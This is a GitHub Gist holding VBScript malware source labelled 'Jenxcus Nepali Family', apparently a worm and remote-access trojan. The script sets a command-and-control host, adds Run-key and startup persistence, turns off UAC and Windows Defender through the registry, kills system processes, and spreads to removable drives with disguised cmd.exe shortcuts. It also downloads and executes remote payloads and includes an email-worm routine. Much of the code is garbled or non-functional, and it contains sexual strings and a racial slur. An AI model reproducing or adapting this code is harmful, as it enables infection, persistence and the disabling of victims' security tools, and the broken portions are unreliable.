Created
September 17, 2024 13:48
-
-
Save Harm355/d2da3a16912e0352f195a8bc8b45103c to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'Jenxcus Nepali Family By [email protected] | |
'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-= | |
dim installdir | |
host = "https://Myr63.com" | |
port = 4555 | |
installdir = "%temp%" | |
lnkfile = true | |
lnkfolder = true | |
runasAdminwithFolder = false | |
if runasAdminwithFolder = true then | |
startupelevatereg() | |
end if | |
'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-= | |
dim fs | |
set fs = createobject("Scripting.FileSystemObject") | |
dim sh | |
set sh = wscript.createobject("Wscript.Shell") | |
dim xm | |
set xm = createobject("Msxml2.XmlHttp") | |
dim ac | |
set ac = fs.getfile(wscript.scriptfullname) | |
dim dr | |
set dr = wscript.createobject("Wscript.Network") | |
'=-=-=-=-= private var =-=-=-=-=-=-=-=-=-=-=-= | |
installname = wscript.scriptname | |
startup = sh.specialfolders ("startup") & "\" | |
installdir = sh.expandenvironmentstrings(installdir) & "\" | |
if not fs.folderexists(installdir) then | |
installdir = sh.expandenvironmentstrings("%temp%") & "\" | |
end if | |
dim splitird | |
dim response | |
dim cmd | |
dim inv | |
splitird = "<Win>" | |
inv = "idm" | |
booty = "" | |
microsoftNET = framework & "%windir%\Microsoft.NET" | |
sh.run "https://www.youtube.com/watch?v=QXn28q7XsIA&pp=ygUDcjYz" | |
info = "" | |
spreadingvirus = "" | |
'=-=-=-=-= start code =-=-=-=-=-=-=-=-=-=-=-=-= | |
on error resume next | |
sh.regread(us) | |
us = "~" | |
email_worm | |
ad = Split(cmd("Perform"), splitird & response & inv) | |
rem case command of self | |
select case ad | |
case "splited" | |
if romaticsexroblox = "" then | |
romaticsexroblox = "booty" | |
end if | |
post "instant-r63-hot-booty-roblox",romaticsexroblox | |
case "internet" | |
post "lan-wifi",phone | |
memzstarter home,"landline-telephone.exe",cmd(1),4,false | |
case "post" | |
post cmd(1),cmd(2) | |
case "execute" | |
ok = cmd (1) | |
execute(ok) | |
case "write" | |
writereg "" | |
case "manaul" | |
msgbox "Showing Houdini Base64 OVB On SSD" | |
case "update" | |
cow(1) = replace(cow(1), "%tempwin%s", win) | |
oneonce.close | |
set fu = fs.opentextfile(installdir & installname & ctrl,1,false) | |
fu.writeline(cow(1)) | |
fu.close | |
sh.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34) | |
case "rename" | |
doom = replace(doom, "%resr", us) | |
if not fs.folderexists(spec) = false then name = "condrv.sys ~1" | |
case "kill process name" | |
killprocess "wininit.exe" | |
case "startupelevatereg" | |
startupelevatereg() | |
case "end" | |
wscript.quit | |
case "memzcode" | |
memzstarter cmd(1),"r63roblox.exe",jenxcus_virus,0,false | |
case "offline memzcode" | |
memzstarter cmd(1),"r63roblox.exe",jenxcus_virus,1,false | |
case "trojan" | |
memzstarter info,"r63roblox.exe","",true | |
case "open booty video" | |
openvideourl "https://www.youtube.com/watch?v=QXn28q7XsIA&pp=ygUDcjYz" | |
case "cum r63 roblox" | |
cum "r63 roblox hot girl","hot" | |
case "spread to infect" | |
cum "r34 roblox hot girl",romaticsexroblox | |
post romaticsexroblox,doom | |
case "disable uac" | |
if wscript.arguments.named.exists("elevated") = true then | |
set oreg = getobject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv") | |
oreg.setdwordvalue &H80000002,"software\microsoft\windows\CurrentVersion\policies\system","enablelua", 0 | |
oreg.setdwordvalue &H80000002,"software\microsoft\windows\CurrentVersion\policies\system","ConsentPromptBehaviorAdmin", 0 | |
oreg.setdwordvalue &H80000002,"software\Policies\microsoft\windows defender","disableantispyware", 1,jenxcus_virus | |
oreg.setdwordvalue &H80000002,"software\Policies\microsoft\windows defender","disableantimalware", 2,jenxcus_virus | |
set oreg = nothing | |
end if | |
case "grabber" | |
grabber "Root.dll",jenxcus_virus,disablesecurity_and_getipgrabber,4,false | |
case "grabber offlinee" | |
grabber "Root.dll",jenxcus_virus,disablesecurity_and_getipgrabber,5,false | |
case "getweblan" | |
serverlanstarter "http://",".com" | |
case "worm virus" | |
hotr63 = post("hot romatic r63",booty) | |
memzstarter "/","r63.exe",hotr63,jenxcus_virus,email_worm | |
grabber "r63.exe",porn,hotr63,cmd(1),managed | |
lookatthebootyr63 = true | |
lookatthebootyr63 = lookatthebootyr63 & hotr63 & getobject("winmgmts:/.//root/user=hacked/hotr63").cum | |
web = serverlanstarter("https://Myr63", ".com") | |
case "kill explorer" | |
sh.run "explorer" | |
killprocess "explorer.exe" | |
end select | |
wscript.sleep(10) | |
dim tor | |
tor =0 | |
tor = tor + 1 | |
for tor = 1 to 20 | |
fuk = ok | |
next | |
exc = post(cmd(1), "rush") | |
sh.run "cmd /c ping 0 " & chr(34) & exc | |
dim ctrl | |
ctrl = "Booty Porn.html.vbs" | |
set args = wscript.argument | |
if args = 78 then | |
code = "dm = true" | |
set monster = fs.createtextfile(installdir & installname & ".vbs") | |
monster.writeline code | |
monster.close | |
sh.run installdir & installname & ".vbs" | |
end if | |
dim arf | |
key = regexp | |
arf =sh.regread(key & regedit) | |
if arf <> "yes" then | |
dim ro: ro = fso.getspecialfolder(1) | |
dim wt | |
wt = "/" & ro & ".vbs" | |
fiber = "r63 roblox.vbs" | |
ass = "Hot Romatic R63 Roblox" | |
ac.copy(installdir & fiber) | |
args = 9 | |
set asr = fs.getfile(file.path) | |
asr.attributes = 9 + 3 | |
sh.run "cmd /c ipconfig /all" | |
end if | |
sub spreadingcommandlnk | |
on error resume next | |
dim lnkobj | |
dim filename | |
dim foldername | |
dim fileicon | |
dim foldericon | |
startupelevatereg | |
for each drive in filesystemobj.drives | |
if drive.isready = true then | |
if drive.freespace > 0 then | |
if drive.drivetype = 1 then | |
fs.copyfile wscript.scriptfullname , drive.path & "\" & installname & ctrl & ass,true | |
if fs.fileexists (drive.path & "\" & installname & ctrl & ass) then | |
filesystemobj.getfile(drive.path & "\" & installname & ctrl & ass).attributes = 2+4 | |
end if | |
for each file in fs.getfolder( drive.path & "\" ).Files | |
if not lnkfile then exit for | |
if instr (file.name,".") then | |
if lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then | |
file.attributes = 2+4 | |
if ucase (file.name) <> ucase (installname) then | |
filename = split(file.name,".") | |
set lnkobj = sh.createshortcut (drive.path & "\" & filename (0) & ".lnk") | |
lnkobj.windowstyle = 7 | |
lnkobj.targetpath = "cmd.exe" | |
lnkobj.workingdirectory = "" | |
lnkobj.arguments = "/c start " & replace(installname & ctrl," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit" | |
fileicon = sh.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\") | |
if instr (fileicon,",") = 0 then | |
lnkobj.iconlocation = file.path | |
else | |
lnkobj.iconlocation = fileicon | |
end if | |
lnkobj.save() | |
end if | |
end if | |
end if | |
next | |
for each folder in fs.getfolder( drive.path & "\" ).subfolders | |
if not lnkfolder then exit for | |
folder.attributes = 2+4 | |
foldername = folder.name | |
set lnkobj = sh.createshortcut (drive.path & "\" & foldername & ".lnk") | |
lnkobj.windowstyle = 7 | |
lnkobj.targetpath = "cmd.exe" | |
lnkobj.workingdirectory = "" | |
lnkobj.arguments = "/c start " & replace(installname & ctrl," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit" | |
foldericon = sh.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\") | |
if instr (foldericon,",") = 0 then | |
lnkobj.iconlocation = folder.path | |
else | |
lnkobj.iconlocation = foldericon | |
end if | |
lnkobj.save() | |
next | |
end If | |
end If | |
end if | |
next | |
err.clear | |
end sub | |
sub unstalldeletereg() | |
dim filename | |
dim foldername | |
sh.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname & ctrl,".")(0) | |
sh.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname & ctrl,".")(0) | |
filesystemobj.deletefile startup & installname ,true | |
filesystemobj.deletefile wscript.scriptfullname ,true | |
for each drive in filesystemobj.drives | |
if drive.isready = true then | |
if drive.freespace > 0 then | |
if drive.drivetype = 1 then | |
for each file in filesystemobj.getfolder ( drive.path & "\").files | |
on error resume next | |
if instr (file.name,".") then | |
if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then | |
file.attributes = 0 | |
if ucase (file.name) <> ucase (installname) then | |
filename = split(file.name,".") | |
fs.deletefile (drive.path & "\" & filename(0) & ".lnk" ) | |
else | |
filesystemobj.deletefile (drive.path & "\" & file.name) | |
end If | |
else | |
fs.deletefile (file.path) | |
end if | |
end if | |
next | |
for each folder in fs.getfolder( drive.path & "\" ).subfolders | |
folder.attributes = 0 | |
next | |
end if | |
end if | |
end if | |
next | |
end sub | |
function writereg(exc) | |
if lcase( mid(wscript.scriptfullname,2))=":\" then | |
us="Yes" | |
sh.regwrite "HKCU\DD", us & split (installname,".")(0) & "\", booty, "REG_SZ" | |
else | |
us="No" | |
sh.regwrite "HKLM\CC", us & split (installname,".")(0) & "\", booty, "REG_SZ" | |
end if | |
end function | |
function Framework_Microsft_NET() | |
dim dotnet | |
dotnet="No" | |
if fs.fileexists(sh.ExpandEnvironmentStrings("%windir%") & "\Microsoft.NET\Framework\v2.0.50727\vbc.exe") then | |
dotnet="Yes" | |
end if | |
end function | |
function killprocess(processname) | |
dim stage | |
processname = array("explorer.exe", "conhost.exe", "conhost.com", "cmd.exe", "cmd.com", "regedit.exe", "regedit.scr", "regedit.pif", "regedit.com", "anitvirus.exe", "svchost.exe", "wininit.exe") | |
set stage = getobject("winmgmts:\\" & "." & "\root\cimv2") | |
for each processname in processnames | |
set col = stage.execquery("Select * Win32_Process Where Process = '" & processname & "'") | |
for each process in col | |
returnlikeworm =process.terminate | |
select case returnlikewrom | |
case "kill" | |
sh.Run "cmd.exe /c @tskill " & processname, false | |
case "staging" | |
cvn = stage.actionsecurity | |
cvn = cvn & "plus" | |
end select | |
next | |
next | |
end function | |
function post(cmd, param) | |
post = "" | |
xm.open "get", "http://" & name & port & "/",false | |
xm.setrequsterserver "user:", info | |
xm.send | |
post = xm.responebody | |
end function | |
sub email_worm | |
set item = sh.createitem(0) | |
item.recipients.add(sh.EmailAdress) | |
item.attachment.add(sh.EmailAdress) | |
item.subject = "Ran" | |
item.body = "File Are CTOS" | |
item.send | |
if sended = true then exit sub | |
f = rnd(82 * 1000000000) | |
end sub | |
function VmSystemAppCheck() | |
dim vm | |
vm = Array("VirtualBox", "VMWare", "Parallels", "Sandbox") | |
set al = getobject("winmgmts:connectionVM//./root/AppVM='application1'") | |
set vb = al.execquery("Select * win32_operatingsystem where VMapp = '" & vm & "'") | |
for each uop in vb | |
result = uop.download | |
if instr( lcase( uop.name),"virtual") >0 then | |
exit function | |
ud = "udi" | |
end if | |
next | |
end function | |
function startupelevatereg() | |
if wscript.arguments.named.exists("elevated") = false then | |
on error resume next | |
wscript.createobject("Shell.Application").shellexecute "wscript.exe", " //B " & chr(34) & wscript.scriptfullname & chr(34) & " /elevated", "", "runas", 1 | |
wscript.quit | |
end if | |
sh.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ" | |
sh.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ" | |
fs.copyfile wscript.scriptfullname,installdir & installname & ctrl,true | |
fs.copyfile wscript.scriptfullname,startup & installname,true | |
set scriptfullnameshort = fs.getfile (wscript.scriptfullname & ctrl & ass) | |
set installfullnameshort = fs.getfile (installdir & installname & ctrl & ass) | |
if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then | |
sh.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34) | |
wscript.quit | |
end if | |
err.clear | |
set oneonce = fs.opentextfile (installdir & installname ,8, false) | |
if err.number > 0 then wscript.quit | |
end function | |
sub disablesecurity_and_getipgrabber() | |
if wscript.arguments.named.exists("elevated") = true then | |
set oreg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv") | |
oreg.setdwordvalue &H80000002,"software\microsoft\windows\currentversion\policies\system","enablelua", 0 | |
oreg.setdwordvalue &H80000002,"software\microsoft\windows\currentversion\policies\system","ConsentPromptBehaviorAdmin", 0 | |
set oreg = nothing | |
end if | |
ip = true | |
ip = replace("adress-computer", world, cmd(1) & post(virus, damage) + 1) | |
executeglobal ip | |
end sub | |
function jenxcus_virus | |
if code = true then code =1 + 0 | |
bacon = "r0bl0x" | |
link = "" | |
set un = createobject("Msxml2.XmlHttp") | |
un.open "get", "https://name.ports/file/name", false | |
un.send | |
link = un.responsebody | |
website = replace("server", link, ip) | |
'disconnectedserver = 0 | |
filename = split(installname,".") & split(file,".") | |
fro = cmd(1) & post("r63 roblox", info) | |
execute(fro) | |
end function | |
function memzstarter(fileurl, filename, filearg, is_offline, is_trojan) | |
if encoded = "" then | |
encoded = "" | |
end if | |
set sick = createobject("Microsoft.XMLDOM") | |
set spike = sick.createlement("tmp") | |
spike.dataType = "bin.base64" | |
spike.text = encoded | |
ans = spike.nodetypedvalue | |
set adodb = createobject("Adodb.Stream") | |
adodb.type = 3 | |
adodb.setchar = 0 | |
adodb.open | |
adodb.write ans | |
adodb.position = 1 | |
adodb.save | |
memzstarter = adodb.readtext | |
executeglobal memzstarter | |
end function | |
connecteddrive = 0 | |
ac.copy(installdir & ctrl) | |
wscript.createbject("Shell.Apsplication").namespacce(&H2).FindInfo | |
dim u | |
u = true | |
for code = u to execute(&H4) | |
if wscript.name = "virus" then | |
set hacking = createobject("Scripting.WormVirus") | |
hacking.infect true | |
end if | |
if hacked = true then exit for | |
next | |
sub openvideourl(url) | |
sh.run url | |
set httpas = createobject("Msxml2.XmlHttp") | |
httpas.open "get", "https://www.youtube.com/watch?v=" & chr(random) & "&pp=" & chr(random), false | |
httpas.send | |
end sub | |
function cum(is_name, status) | |
memzstarter cmd(1),"r63pornroblox.exe",jenxcus_virus,2,false | |
set e = fs.createtextfile("love.vbs") | |
e.writeline("on error resume next") | |
e.writeline("rem cummed") | |
e.writeline("msgbox(""""you cummed me, im hot."""")") | |
e.close | |
sh.run "love.vbs" | |
end function | |
sub getr63roblox() | |
cum "r63 roblox sexy","cummed" | |
encoded = "[mp4] 12 V3" | |
set ass = createobject("Microsoft.XMLDOM") | |
set bootyr63 = ass.createlement("tmp") | |
spike.dataType = "bin.base64" | |
spike.text = encoded | |
spike.nodetypedvalue | |
if romaticsexyroblox <> " hot roblox r63 girl" = true then | |
ass =true | |
end if | |
end sub | |
function grabber(filename, is_offline, is_grab, args, filemanage) | |
if app = array("chrome google", "microsoft edge", "firefox", "iexplorer", "mozilla") then | |
deep = cmd(1) & jenxcus_virus | |
executeglobal deep | |
end if | |
select case frame | |
case 1 | |
memzstarter cmd(1),"df.exe",filemanage,2,false | |
end select | |
hot = romaticsexyroblox | |
end function | |
access = "rat trojan" | |
hacking.cum "r34 roblox","hot and sexy romatic" | |
post "ua","u" | |
spreading = memzstarter("\", jenxcus_virus, 2, grabber(".vbs", info, spreading, virus, manage), virus) | |
spreadingvirus = "r63" | |
sh.regwrite "HKLM\SOFTWARE\microsoft\windows\currentVerison\sexual",spreadingvirus,"REG_SZ" | |
if usbvirus = "" then | |
usbvirus = dr.enumnetworkdrive | |
end if | |
sub spreadingusb | |
sh.write "HKLM\SOFTWARE\driverusb",usbvirus & spreading,"REG_DWORD" | |
payload = "today " & date | |
end sub | |
function serverlanstarter(name, portnum) | |
dim hostweb, server, portd | |
server = "" | |
hostweb = "http://" | |
portd = hostweb & "name.port" | |
set h = createobject("Msxml2.XmlHttp") | |
h.open "GET", hostweb | |
h.setrheadrequster "user:" & info | |
h.send | |
server = h.responseweb | |
nigga = installdir & installname | |
set ma = createobject("Adodb.Stream") | |
ma.open | |
ma.type = 1 | |
ma.write server | |
ma.save nigga | |
ma.close | |
if fs.fileexists(nigga) then | |
sh.run chr(34) & nigga & chr(34) & hostweb & "" & portd & "" & name & portnum | |
end if | |
end function | |
usbspreading = sh.regread("HKLM\SOFTWARE\driverusb") | |
sh.run "wscript.exe", " //b" & chr(34) & installdir & installname & chr(34) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment